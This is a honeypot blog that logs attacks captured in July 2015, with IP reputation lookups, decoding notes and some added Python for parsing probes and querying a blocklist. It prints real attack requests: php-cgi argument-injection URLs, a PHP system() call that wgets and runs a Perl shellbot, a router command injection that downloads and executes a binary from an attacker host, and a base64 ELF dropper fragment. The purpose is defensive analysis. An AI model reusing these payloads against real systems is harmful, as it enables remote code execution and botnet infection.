Freitag, 31. Juli 2015

MongoDB - scanning ip 89.248.167.159

I set up a MongoDB dummy some time ago. I am not quite sure how to handle the data I am receiving, which is the main reason I have not yet reported any of it. Today, while reviewing the logs, I saw that one IP accessed my dummy on both of my honeypots, which is at least a bit strange. In addition, the IP accessed only this dummy.

BEGIN OF MONGODB DATA:
2015-07-31 18:09:04
Source IP: 89.248.167.159
Country: NL RiskScore: 8.6 Malware: []
:▒▒zr▒admin.$cmd▒▒▒▒ismaster
 END OF DATA
The captured bytes are an ismaster command sent to the admin.$cmd collection: the handshake every MongoDB driver sends first, and the quickest way for a scanner to fingerprint an exposed instance. According to IBM X-Force data this IP address is known for scanning activity:
"geo": {
      "country": "Netherlands",
      "countrycode": "NL"
   },
   "ip": "89.248.167.159",
   "reason": "Firewall deny log analysis",
   "reasonDescription": "This IP was involved in port scanning activities.",
   "score": 8.6,
   "subnets": [
      {
         "categoryDescriptions": {},
         "cats": {},
         "created": "2012-03-22T07:26:00.000Z",
         "geo": {
            "country": "Netherlands",
            "countrycode": "NL"
         },
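As an added example (my code, not the blog's) of what that garbled line is: the bytes form a MongoDB OP_QUERY message carrying the ismaster command against admin.$cmd, the first message a driver, and a mass scanner, sends to fingerprint a server. The code builds such a probe as constructed sample input and parses it back, so the dummy could log a classified event instead of raw bytes.

```python
"""Decode the MongoDB wire-protocol probe a scanner sends first.

Added example, not code from the blog. An OP_QUERY message is a 16-byte header
(messageLength, requestID, responseTo, opCode), int32 flags, the full
collection name as a C string, numberToSkip, numberToReturn and one BSON
query document. Building the probe as constructed sample input and parsing it
back turns the garbled log line into a classified event.
"""
from __future__ import annotations

import struct

OP_QUERY = 2004  # legacy opcode; the first handshake message still uses it


def bson_encode_int32_doc(pairs: list[tuple[str, int]]) -> bytes:
    """Minimal BSON encoder: int32 (0x10) elements only, enough for {ismaster: 1}."""
    body = b"".join(b"\x10" + k.encode() + b"\x00" + struct.pack("<i", v) for k, v in pairs)
    return struct.pack("<i", len(body) + 5) + body + b"\x00"


def build_op_query(collection: str, query: bytes, request_id: int = 1) -> bytes:
    """Assemble an OP_QUERY message as a driver or scanner would."""
    payload = (
        struct.pack("<i", 0)                 # flags
        + collection.encode() + b"\x00"      # fullCollectionName, e.g. admin.$cmd
        + struct.pack("<ii", 0, -1)          # numberToSkip, numberToReturn
        + query
    )
    return struct.pack("<iiii", 16 + len(payload), request_id, 0, OP_QUERY) + payload


def bson_decode(data: bytes) -> dict:
    """Decode a flat BSON document (double, string, bool, int32, int64 elements)."""
    (length,) = struct.unpack_from("<i", data, 0)
    pos, doc = 4, {}
    while pos < length - 1:                  # the document ends with a 0x00 byte
        etype = data[pos]
        end = data.index(b"\x00", pos + 1)
        name = data[pos + 1:end].decode()
        pos = end + 1
        if etype == 0x01:
            (value,) = struct.unpack_from("<d", data, pos)
            pos += 8
        elif etype == 0x02:
            (slen,) = struct.unpack_from("<i", data, pos)
            value = data[pos + 4:pos + 4 + slen - 1].decode()
            pos += 4 + slen
        elif etype == 0x08:
            value = bool(data[pos])
            pos += 1
        elif etype == 0x10:
            (value,) = struct.unpack_from("<i", data, pos)
            pos += 4
        elif etype == 0x12:
            (value,) = struct.unpack_from("<q", data, pos)
            pos += 8
        else:
            raise ValueError(f"unsupported BSON element type 0x{etype:02x}")
        doc[name] = value
    return doc


def parse_op_query(msg: bytes) -> dict:
    """Parse header and body of an OP_QUERY message; reject anything else."""
    if len(msg) < 16:
        raise ValueError("short message")
    length, request_id, response_to, opcode = struct.unpack_from("<iiii", msg, 0)
    if opcode != OP_QUERY or length != len(msg):
        raise ValueError("not a complete OP_QUERY message")
    (flags,) = struct.unpack_from("<i", msg, 16)
    end = msg.index(b"\x00", 20)
    skip, limit = struct.unpack_from("<ii", msg, end + 1)
    return {"request_id": request_id, "response_to": response_to, "flags": flags,
            "collection": msg[20:end].decode(), "skip": skip, "limit": limit,
            "query": bson_decode(msg[end + 9:])}


def classify(msg: bytes) -> str:
    """Label the probe: ismaster against <db>.$cmd is the fingerprinting handshake."""
    info = parse_op_query(msg)
    db, _, coll = info["collection"].partition(".")
    if coll == "$cmd" and "ismaster" in {k.lower() for k in info["query"]}:
        return f"handshake: ismaster on db '{db}'"
    return f"query on {info['collection']}"


# Constructed sample: the probe behind the "admin.$cmd ... ismaster" log line.
SAMPLE_PROBE = build_op_query("admin.$cmd", bson_encode_int32_doc([("ismaster", 1)]))

if __name__ == "__main__":
    print(classify(SAMPLE_PROBE), parse_op_query(SAMPLE_PROBE))
```

A dummy that answers the ismaster probe with a plausible document gets the follow-up commands (listDatabases, find on interesting collections) that distinguish a scanner taking inventory from one that only fingerprints; a dummy that stays silent only ever logs this first message.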
 
 

HTTP Buffer overflow attack - 204.15.135.116

BEGIN OF HTTP DATA:
2015-07-31 12:43:19
Source IP: 204.15.135.116
Country: US RiskScore: 1 Malware: []
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%6
9%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%7
2%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%6
4%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%7
4%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 43604
Connection: close
The encoded URL, decoded with Python's urllib, translates to:
from urllib.parse import unquote   # Python 3; in Python 2: urllib.unquote(url)
print(unquote(url))
/cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env="yes"+-d+cgi.fix_pathinfo=1+-d+auto_prepend_file=php://input+-n HTTP/1.1
 
The request was followed by PHP code in the body. php-cgi parses the percent-encoded query string as command-line arguments (CVE-2012-1823), and -d auto_prepend_file=php://input makes it execute that body:
<?php
$bufferf = 'f0VMRgIBAQMAAAAAAAAA [...snip...]
My buffer read 16k of data and ended the connection.
IP intelligence from IBM X-Force shows:
{
   "categoryDescriptions": {},
   "cats": {},
   "geo": {
      "country": "United States",
      "countrycode": "US"
   },
   "ip": "204.15.135.116",
   "reason": "Firewall deny log analysis",
   "reasonDescription": "This IP was involved in port scanning activities.",
   "score": 1,
}
The IP performed 4 of these requests in a row.

Sonntag, 26. Juli 2015

Two stage nttpd attack - 119.42.100.97

BEGIN OF HTTP DATA:
2015-07-27 00:58:11
Source IP: 119.42.100.97
Country: TH RiskScore: 2.9 Malware: []
GET /tmUnblock.cgi HTTP/1.1


 END OF DATA

BEGIN OF HTTP DATA:
2015-07-27 00:58:51
Source IP: 119.42.100.97
Country: TH RiskScore: 2.9 Malware: []
POST /tmUnblock.cgi HTTP/1.1
content-length: 943

%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e%3d&%61%63%74%69%6f%6e%3d&%63%6f%6d%6d%69%74%3d&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74%6d%70%3b%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%72%6d%20%2d%66%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%2e%6e%74%74%70%64%20%68%74%74%70%3a%2f%2f%31%31%39%2e%34%32%2e%31%30%30%2e%39%37%3a%33%33%34%34%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%2e%2f%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%2e%73%68%3b%2e%2f%2e%6e%74%74%70%64%2e%73%68%60&%53%74%61%72%74%45%50%49%3d%31
 END OF DATA

This decodes to:
submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp;echo "#!/bin/sh" > .nttpd.sh;echo "rm -f .nttpd" >> .nttpd.sh;echo "wget -O .nttpd http://119.42.100.97:3344" >> .nttpd.sh;echo "chmod +x .nttpd" >> .nttpd.sh;echo "./.nttpd" >> .nttpd.sh;chmod +x .nttpd.sh;./.nttpd.sh`&StartEPI=1
As you can see, the first probe, GET /tmUnblock.cgi, looked successful to the attacker (the honeypot answers 200 OK to everything), so it followed up with the command injection in the ttcp_ip parameter of tmUnblock.cgi (a Linksys router CGI) to fetch and run the nttpd binary on the system.

I was still not able to get my hands on this code. If someone has it, please let me know.

IBM X-Force shows:
{
   "categoryDescriptions": {
      "Dynamic IPs": "This category contains IP addresses of dialup hosts and DSL lines.",
      "Spam": "This category lists IP addresses that were seen sending out spam."
   },
   "cats": {
      "Dynamic IPs": 86,
      "Spam": 29
   },
   "geo": {
      "country": "Thailand",
      "countrycode": "TH"
   },
   "ip": "119.42.100.97",
   "reason": "Spam sending activity",
   "reasonDescription": "This IP was involved in spam sending activities.",
   "score": 2.9,
   "subnets": [
      {
         "categoryDescriptions": {},
         "cats": {},
         "created": "2014-01-23T17:33:00.000Z",
         "geo": {
            "country": "Thailand",
            "countrycode": "TH"
         },

Samstag, 25. Juli 2015

Announcement: dnsbl.sendmespam-ids.info

I found it very interesting that the majority of the IP addresses hitting my honeypot have a good reputation, although they are trying SQL injections, code execution, telnet attacks or email spamming.

So I played around with

and set up my own blacklist. Currently it has 400 unique IP addresses seen in all sorts of attacks. I am not done with it, but it is available now. So if you have any questions or improvement ideas, just let me know.

 dnsbl.sendmespam-ids.info

and of course let me know if there is any issue.
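To show the mechanics a consumer of a list like this relies on, here is an added example (my code, not the author's; it assumes nothing about how dnsbl.sendmespam-ids.info is populated or which return codes it uses): a DNSBL client that builds the reversed query name, resolves it and interprets the answer per RFC 5782. The "listed" entry in the fake resolver is constructed test data, not a real listing.

```python
"""Query a DNS blocklist (DNSBL) the way an MTA or IDS does.

Added example, not the author's code; it assumes nothing about how
dnsbl.sendmespam-ids.info is populated or which return codes it uses. The
mechanism (RFC 5782): reverse the address labels (octets for IPv4, nibbles
for IPv6), append the zone, resolve an A record. An answer in 127.0.0.0/8
means "listed", NXDOMAIN means "not listed".
"""
from __future__ import annotations

import ipaddress
import socket
from typing import Callable, Optional

LISTED_RANGE = ipaddress.ip_network("127.0.0.0/8")


def dnsbl_query_name(ip: str, zone: str) -> str:
    """Build the reversed lookup name, e.g. 131.63.154.198.<zone>."""
    addr = ipaddress.ip_address(ip)
    if addr.version == 4:
        labels = str(addr).split(".")
    else:
        labels = list(addr.exploded.replace(":", ""))   # 32 hex nibbles
    return ".".join(reversed(labels)) + "." + zone.strip(".") + "."


def dnsbl_lookup(ip: str, zone: str,
                 resolve: Callable[[str], str] = socket.gethostbyname) -> Optional[str]:
    """Return the A record for the DNSBL name, or None on NXDOMAIN / resolver error."""
    try:
        return resolve(dnsbl_query_name(ip, zone))
    except socket.gaierror:
        return None


def is_listed(answer: Optional[str]) -> bool:
    """Only 127.0.0.0/8 answers count; anything else is a wildcard or misconfiguration."""
    return answer is not None and ipaddress.ip_address(answer) in LISTED_RANGE


def check(ip: str, zone: str,
          resolve: Callable[[str], str] = socket.gethostbyname) -> dict:
    """One lookup with the query name kept, so a hit can be audited later."""
    answer = dnsbl_lookup(ip, zone, resolve)
    return {"ip": ip, "query": dnsbl_query_name(ip, zone),
            "answer": answer, "listed": is_listed(answer)}


def make_fake_resolver(table: dict[str, str]) -> Callable[[str], str]:
    """Offline stand-in for socket.gethostbyname: NXDOMAIN for unknown names."""
    def resolve(name: str) -> str:
        if name in table:
            return table[name]
        raise socket.gaierror(-2, "Name or service not known")
    return resolve


# Constructed test data: pretend the Jul 4 attacker is listed with code 127.0.0.2.
FAKE_ZONE_DATA = {"131.63.154.198.dnsbl.sendmespam-ids.info.": "127.0.0.2"}

if __name__ == "__main__":
    fake = make_fake_resolver(FAKE_ZONE_DATA)
    print(check("198.154.63.131", "dnsbl.sendmespam-ids.info", fake))
    print(check("198.154.63.131", "dnsbl.sendmespam-ids.info"))   # live query
```

The is_listed check matters in practice: a zone that expires or gets parked can start answering every name with a public address, and a client that treats any answer as a listing then blocks everyone.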

Compromise attempt (Perl Shellbot) - 128.41.128.44

BEGIN OF HTTP DATA:
2015-07-24 13:15:21
Source IP: 128.41.128.44
Country: GB RiskScore: 7.1 Malware: []
POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%
64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F
%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Content-Type: application/x-www-form-urlencoded
Content-Length: 204

<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("wget 194.60.242.251/minispeedtest/speedtest/.z/hb/plk03 -O /tmp/.0e1bc.log;perl /tmp/.0e1bc.log 188.165.44.137;rm -rf /tmp/.0e1bc.log;"); ?>
 END OF DATA

The decoded URL looks like:
 /phppath/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-n
The downloaded file (plk03) is a Perl-based shellbot; the IP passed to it as an argument is the server it connects to.


  • 188.165.44.137, the address passed to the script as argument (the server it connects to):
    {
       "categoryDescriptions": {},
       "cats": {},
       "geo": {
          "country": "France",
          "countrycode": "FR"
       },
       "ip": "188.165.44.137",
       "reason": "Regional Internet Registry",
       "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
       "score": 1,
       "subnets": [
          {
             "categoryDescriptions": {},
             "cats": {},
             "created": "2012-03-22T07:26:00.000Z",
             "geo": {
                "country": "France",
                "countrycode": "FR"
             },
             "ip": "188.165.0.0",
             "reason": "Regional Internet Registry",
             "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
             "score": 1,
             "subnet": "188.165.0.0/16"
          }
       ]
    }

  • 194.60.242.251, the download host:
    {
       "categoryDescriptions": {
          "Scanning IPs": "These IPs have been identified as illegally scanning networks for vulnerabilities."
       },
       "cats": {
          "Scanning IPs": 14
       },
       "geo": {
          "country": "Ukraine",
          "countrycode": "UA"
       },
       "ip": "194.60.242.251",
       "reason": "Firewall deny log analysis",
       "reasonDescription": "This IP was involved in port scanning activities.",
       "score": 1.4,
       "subnets": [
          {
             "categoryDescriptions": {},
             "cats": {},
             "created": "2012-03-22T07:26:00.000Z",
             "geo": {
                "country": "Ukraine",
                "countrycode": "UA"
             },
             "ip": "194.60.242.0",
             "reason": "Regional Internet Registry",
             "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
             "score": 1,
             "subnet": "194.60.242.0/24"
          }
       ]
    }
  • 194.24.228.203, the bot IP hardcoded in the script:
    {
       "categoryDescriptions": {},
       "cats": {},
       "geo": {
          "country": "France",
          "countrycode": "FR"
       },
       "ip": "194.24.228.203",
       "reason": "Regional Internet Registry",
       "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
       "score": 1,
       "subnets": [
          {
             "categoryDescriptions": {},
             "cats": {},
             "created": "2012-03-22T07:26:00.000Z",
             "geo": {
                "country": "France",
                "countrycode": "FR"
             },
             "ip": "194.24.228.0",
             "reason": "Regional Internet Registry",
             "reasonDescription": "One of the five RIRs announced a (new) location mapping of the IP.",
             "score": 1,
             "subnet": "194.24.228.0/23"
          }
       ]
    }

Freitag, 24. Juli 2015

Telnet hit with code execution attempt - 118.45.65.144

BEGIN OF TELNET DATA:
2015-07-24 05:33:40
Source IP: 118.45.65.144
Country: KR RiskScore: 1 Malware: []
rm /var/run/.zollard/*^Mrm -rf /var/run/.zollard^M/\-/yjTk\0AHf;/\-/0AHf\Yd9Z;cat /proc/mounts;/\-/Yd9Z\pgWD^M
User: admin
Pass: admin

 END OF DATA
The /var/run/.zollard directory the command cleans up is the marker used by the Zollard worm (Symantec's Linux.Darlloz writeup):

https://www.symantec.com/security_response/writeup.jsp?docid=2013-112710-1612-99&tabid=2

The file is related to this worm.

Looking for open SMTP - 193.0.200.136

193.0.200.136
Country: RU RiskScore: 2.9 Malware: [{u'count': 35, u'origin': u'CnC', u'last': u'2014-09-25T07:08:00Z', u'family': [u'darkcomet'], u'ip': u'0x00000000000000000000ffffc100c888', u'uri': u'', u'lastseen': u'2014-09-25T07:08:00Z', u'first': u'2014-09-25T07:08:00Z', u'type': u'CnC', u'firstseen': u'2014-09-25T07:08:00Z', u'md5': u'07A120BC14F6C76372C08547600FC4C0'}]
noauth@jsany.me
zurdocore19@gmail.com
147
MIME-Version: 1.0
From: noauth@jsany.me
To: zurdocore19@gmail.com
Date: 25 Jul 2015 01:32:14 +0200
Subject: 109.234.106.8,noauth@jsany.me,noauth

Telnet hit by well known ip - 98.121.74.52

BEGIN OF TELNET DATA:
2015-07-24 12:25:04
Source IP: 98.121.74.52
Country: US RiskScore: 10 Malware: [{u'count': 1, u'origin': u'SPM', u'domain': u'petuntzesn.debestellung.biz', u'last': u'2015-06-09T14:30:00Z', u'family':
[u'Spam Zero-Day'], u'filepath': u'Rechnung_655377.scr', u'ip': u'0x00000000000000000000ffff62794a34', u'uri': u'file://Rechnung_655377.scr', u'lastseen': u'
2015-06-09T14:30:00Z', u'first': u'2015-06-09T14:30:00Z', u'type': u'SPM', u'firstseen': u'2015-06-09T14:30:00Z', u'md5': u'5081146A6A8549DF8D914DF2B0AF92B5'
}, {u'count': 1, u'origin': u'SPM', u'domain': u'petuntzesn.debestellung.biz', u'last': u'2015-06-09T13:30:00Z', u'family': [u'Spam Zero-Day'], u'filepath':
u'Rechnung_3691423.scr', u'ip': u'0x00000000000000000000ffff62794a34', u'uri': u'file://Rechnung_3691423.scr', u'lastseen': u'2015-06-09T13:30:00Z', u'first'
: u'2015-06-09T13:30:00Z', u'type': u'SPM', u'firstseen': u'2015-06-09T13:30:00Z', u'md5': u'5081146A6A8549DF8D914DF2B0AF92B5'}]
User:
Pass:

 END OF DATA
The output above is what IBM X-Force returns; it gives details about the malware seen on the IP address (here spam attachments named Rechnung_*.scr). IBM X-Force is integrated into my honeypot solution by default.

HTTP/2 malicious SERVER PUSH (weak POC)

HTTP/2 now supports SERVER PUSH messages

HTTP/2 adds a new interaction mode whereby a server can push responses to a client (Section 8.2). Server push allows a server to speculatively send data to a client that the server anticipates the client will need, trading off some network usage against a potential latency gain. The server does this by synthesizing a request, which it sends as a PUSH_PROMISE frame. The server is then able to send a response to the synthetic request on a separate stream.
(https://http2.github.io/http2-spec/)
So, in my mind, that gives a fraudulent server a great opportunity to do bad things to the client. While thinking about it, and jumping back out of bed to search for a scenario, I created the data for this (weak) POC.
I call it a weak POC because I guess there is much more to it; I just wanted to show that it works in some way. What an attacker could actually do with it is for others to prove :-)

I used nghttp2 for both, server and client.

The server is started with
 ./nghttpd -v  --echo-upload -p/test=/eicar.com.txt.gz --early-response 8081 local.key local.crt
The -p option tells the server to push /eicar.com.txt.gz (the EICAR test signature) whenever /test is requested.

The client is then called with
  ./nghttp -v https://<local ip>:8081/test

On the server side, the verbose output shows that the server sent the EICAR test signature as intended.

[server-side nghttpd -v output: screenshot not preserved]

The push shows up in the client output as well,

[client-side nghttp -v output: screenshot not preserved]

and the pushed content gets displayed later on.

[client output showing the pushed EICAR content: screenshot not preserved]

Donnerstag, 23. Juli 2015

HTTP Buffer overflow attempt - 204.15.135.116

BEGIN OF HTTP DATA:
2015-07-23 18:20:31
Source IP: 204.15.135.116
Country: US RiskScore: 1 Malware: []
POST /cgi-bin/php-cgi.bin?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68
%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65
%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F
%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F
%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 43604
Connection: close
The decoded string is:
 /cgi-bin/php-cgi.bin?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env="yes"+-d+cgi.fix_pathinfo=1+-d+auto_prepend_file=php://input+-n

More interesting is the payload the request delivered. The body is PHP code that php-cgi executes because of auto_prepend_file=php://input, and the $bufferf variable holds a base64-encoded ELF binary (the prefix f0VMRgIBAQ decodes to \x7fELF followed by 02 01 01: a 64-bit, little-endian ELF), i.e. a dropped executable rather than a buffer overflow in the classic sense:

 <?php
$bufferf = 'f0VMRgIBAQMAAAAAAAAAAAIAPgABAAAAEDwQAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAACAEAAAAAAAAEAAAAFAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAA5EMAAAAAAADkQwAAA
AAAAAAAEAAAAAAAAQAAAAYAAADgmwAAAAAAAOCbUAAAAAAA4JtQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAB1k/mqVVBYIeAHDRYAAAAAYJ4AAGCeAAAAAgAAsAAAAAIAAAD7+yH/f0VMRgIBAQACAD4ADdAbQA+7ZL8XBQCglyITOADdsu67CAUbABoABg8FJwdA5IQ8IcABAAgA2GCT7gNwBHhABwIyIU8cAAAB+cAG9m+NB2SJADyTbQkAEDcGkJ6dkO8HUDAFN+ALNxnkQgIoBySDTUhQoN+gpJsMMgQcB0AHmZA
nIAAABFDlE/K933RkC+SADQdAlGcOS8gBADdRp4BhI7AApwAAAAAAAEAC/2SHAADuOAAAAkkHANt/u/0vbGliNjQFZC0IbnV4LXg4Ni0PLvem2/5zby4yAAQAABADAUdOVQAASHfJ5QIABgBDC1BN0w02Swc8
H0lATTdI0zQyO0RKA6S7sE0HOQAAEws0gDTdF2cpaxY2NE03yCgNGzU+RQ02SNNMIE+zC03TdIMPSB8FKzElgw3SNCojIQc4gw3YIC2TPQdH0zTdIA4DOkFGbNM0TRsUTggzAACSAeyCAy8PZpDBBhgjEBWQb
kCaBAoSCx9kCBtsHgcmTxEhGaQbLiMJIoakG7IsDwYTMCdBugHpDyQvCzemaZqGHCc/FxlCAZBBmh0MGmSQy96KAdcXOG5eyEGGo0kCSAEMciHPR3YABZ6H5OyQbAEXvIUADDIkJyYoTyBDMoTI95CDDcn2Xo
/HALtAnrzIAAgCcdeNZJAhjs6DMCSDRx+vBwuQDDIk1XTsAjnYkY9qAA5fHZLBhpkXaO1EO6SQnEd7myB3IWSwIZsXgkhOXsgVAr4KB+SQnHBiAcc7IQIdsiHkGFan3wuEMIScL7QGN32NQzZbj+kHihstQjb
IkC+czxeTQ/K9j7+7PAFIBhmSlVSzySEZbNwX/6oBSE4OyfhmANCMIRlki/JkP2SQIRncEkEtG7IhYy8rH2BDNoFHpC+kF8iGDck09DdfCENycrkBZdRXXNghbBdqAi+iDDYkg9kQj8FGMsiQ8vcGGZLBXy43
6yEZbEgzL2JgDMnJOQE0rc9CTg7JUckAVMnJIRtIFzwD4TYkgw1Ld8iQCCQXCBwCh+iQITk7qQGnSSUNyQVyugA8cQwyJIPvmBFCsJE1hHFPHySDDdkXCket7JAMNu4Xex8Bg05oE+fA1UCVTQgGkHjOHgAgB
0KQnHXId0EBH9TYEDLIClkVX+3//0MAX0p2X1JlZ2lzdGVyQ2xhc3NlcxN3tL39X2dtb25fEmFydAsAOnB0aP23ePRyZWFkLwl3YWl0cGlkALDbVroRY3a4KG4HdAAhbXOXfV9leGkMYwVXAFNvxdq3bi1hY2
NlFzxVb3Jrt67dbhVpZxN0aT9vaDdycrqRzf5ub19sb2NhEhCEY9Z+a/R+JJZyY3B5ABQ83ejb3WwMZG91UHZzcHLXdGa5d262D24IQCd0b2xfDTc3drtKbmEqZ2W1ZgfibWVtt+a+bURwZYsTZW8xbdvWbq4
jbUFsZacFeZ5udmtta6YgbyJ8d2NrNWvb/7rHbOpmZmx1c2gGYy4RzwoXWtc0cm0GPGtp2JpbagaTae4DMF/NtdddAmRyNXQ [... SNIPPET. ..]
 
My honeypot fetched 8k of data, which is the maximum length of the buffer used.

Dienstag, 21. Juli 2015

Telnet Honeypot works

More like a Proof of Service
2015-07-22 06:46:58
Source IP: 218.161.14.170
Country: TW RiskScore: 1 Malware: []
echo -e '\x67\x61\x79\x66\x67\x74'
User: root
Pass: root

 END OF DATA
I implemented a TELNET honeypot service yesterday evening.
The access attempts during the night show that it works. The one posted above is one of the nicer ones, as the attacker at least tried to run a command as well: the echo decodes to the string "gayfgt", which Gafgyt/BASHLITE scanners expect to see echoed back as proof of a working shell.

The TELNET server welcomes you and asks for a username and password. It lets you in regardless and gives you the chance to fire one command; actually, it lets you type one command.

Montag, 20. Juli 2015

A two stage compromise attack

I am pretty sure you have read the blog post about the PHP code execution attack.

If you want to read the full data of my analysis, I would like to point you to the PDF on this attack:
https://drive.google.com/file/d/0B9asJlVwm-MObnluUUJoVzdQYkk/view?usp=sharing

But now to the other side of the story. With my other/old honeypot I did not have the feature of successful attacks, meaning they always responded in one of two ways:
  • random data (like Artillery)
  • an unsuccessful "40x" (like Beeswarm and Apache)
My software, on the other hand, was designed to respond with "200 OK" to every request received. The basic idea was simply that I needed to respond with something, and "200 OK" made the most sense. By this design I may have found a real benefit I was not aware of.

Two stage compromise attacks

 The attack described in the other post had two stages:
  1. the PHP-related encoded URL
  2. a PHP system() call to download and execute the malicious code
I am currently sure that stage two would not have happened had I not responded with "200 OK" to the first stage. So the attack design is an IF...THEN attack.

Stage 1 is only used to find a vulnerable target, so the attacker does not spread the code into the wild, or into the hands of a researcher, without being sure it would work.
 A good indicator for this theory is that although the malware was written in 2008 and repacked in 2014, many anti-virus solutions do not detect it, and even VirusTotal does not report the download site as malicious.



Sonntag, 19. Juli 2015

Encoded bot execution from 162.209.14.224 including attack IPs

2015-07-19 16:28:52
Source IP: 162.209.14.224
Country: US RiskScore: 1 Malware: []
POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d
%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5
